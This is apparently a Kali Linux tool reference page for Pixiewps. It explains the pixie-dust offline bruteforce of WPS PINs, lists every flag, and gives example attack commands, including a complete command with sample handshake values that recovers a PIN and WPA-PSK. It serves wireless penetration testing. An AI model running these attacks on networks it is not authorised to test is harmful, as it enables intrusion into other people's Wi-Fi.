Wireless Attackswpspixie-dustbruteforcewifioffline

Pixiewps

Pixiewps is an offline WPS bruteforce tool that exploits low or non-existing entropy in some Access Points using the pixie dust attack. It recovers WPS PINs and WPA-PSK from captured WPS handshake data.

Description

Pixiewps is a C-based tool designed for educational purposes to perform offline bruteforce attacks against Wi-Fi Protected Setup (WPS) by exploiting vulnerabilities in Access Points with predictable or low-entropy Diffie-Hellman key generation. It implements the pixie dust attack, allowing rapid recovery of WPS PINs without online interaction after capturing necessary handshake elements like enrollee and registrar public keys, hashes, and nonces.

Use cases include testing WPS-enabled routers for pixie dust vulnerabilities during wireless penetration testing. It works alongside tools like Reaver or Bully to capture required data, then processes it offline for efficiency. The tool supports multiple attack modes targeting specific AP firmware behaviors, such as RT/MT/CL, eCos variants, and RTL819x.

Key features include recovery of authentication session keys, enrollee nonces, and encrypted settings from WPS messages M5 and M7, particularly effective against mode 3 vulnerable APs. Dates can be specified for mode 3 attacks to align with AP time-based entropy generation.

How It Works

Pixiewps exploits weak Diffie-Hellman key exchanges in WPS handshakes where Access Points generate public keys with low entropy, enabling offline computation of shared secrets. It uses enrollee public key (PKE from M1), registrar public key (PKR from M2), E-Hash1/2 (from M3), nonces, BSSID, and optionally encrypted M5/M7 settings to derive seeds, PSKs, and the WPS PIN. Multiple modes (1-5) implement vendor-specific entropy prediction algorithms, such as RT/MT/CL (mode 1) or eCos simple (mode 2), bruteforcing possible values rapidly. For mode 3, it recovers nonces from encrypted settings and computes PIN if hashes are provided.

Installation

bash

sudo apt install pixiewps

Flags

-e, --pkeEnrollee's DH public key, found in M1.

-r, --pkrRegistrar's DH public key, found in M2.

-s, --e-hash1Enrollee hash-1, found in M3. It's the hash of the first half of the PIN.

-z, --e-hash2Enrollee hash-2, found in M3. It's the hash of the second half of the PIN.

-a, --authkeyAuthentication session key. Can be avoided by specifying small Diffie-Hellman keys and --e-nonce, --r-nonce, --e-bssid.

-n, --e-nonceEnrollee's nonce, found in M1.

-m, --r-nonceRegistrar's nonce, found in M2. Used with other parameters to compute the session keys.

-b, --e-bssidEnrollee's BSSID. Used with other parameters to compute the session keys.

-S, --dh-smallSmall Diffie-Hellman keys (deprecated). The same option must be specified in Reaver too.

--mode N[,... N]Select modes, comma separated: 1 (RT/MT/CL), 2 (eCos simple), 3 (RTL819x), 4 (eCos simplest) [Experimental], 5 (eCos Knuth) [Experimental].

--start [mm/]yyyyStarting date for mode 3.

--end [mm/]yyyyEnding date for mode 3.

-7, --m7-encEncrypted settings, found in M7. Recover Enrollee's WPA-PSK and secret nonce 2 (mode 3).

-5, --m5-encEncrypted settings, found in M5. Recover Enrollee's secret nonce 1. Use with --m7-enc.

Examples

Full pixie dust attack example recovering WPS PIN 04847533 using authkey, public keys, hashes, and nonce in mode 1 (default), outputs PSK candidates and time taken.

pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec -n 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

Basic attack avoiding authkey by using small DH keys, enrollee nonce, registrar nonce, and BSSID to compute session keys.

pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -S -n <e-nonce> -m <r-nonce> -b <e-bssid>

Mode 3 attack recovering WPA-PSK and secret nonce 2 from M7 encrypted settings.

pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> --mode 3

Mode 3 attack recovering secret nonce 1 from M5 encrypted settings along with M7.

pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> --mode 3

Full mode 3 attack also recovering WPS PIN using E-Hash1 and E-Hash2 with M5/M7 encrypted settings.

pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> -s <e-hash1> -z <e-hash2> --mode 3

Display help and full argument descriptions for Pixiewps 1.4.

pixiewps --help

Attack using authentication key, public keys, and E-Hashes without nonces (requires modified Reaver/Bully).

pixiewps -a <authkey> -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2>

Updated 2026-04-16kali.org ↗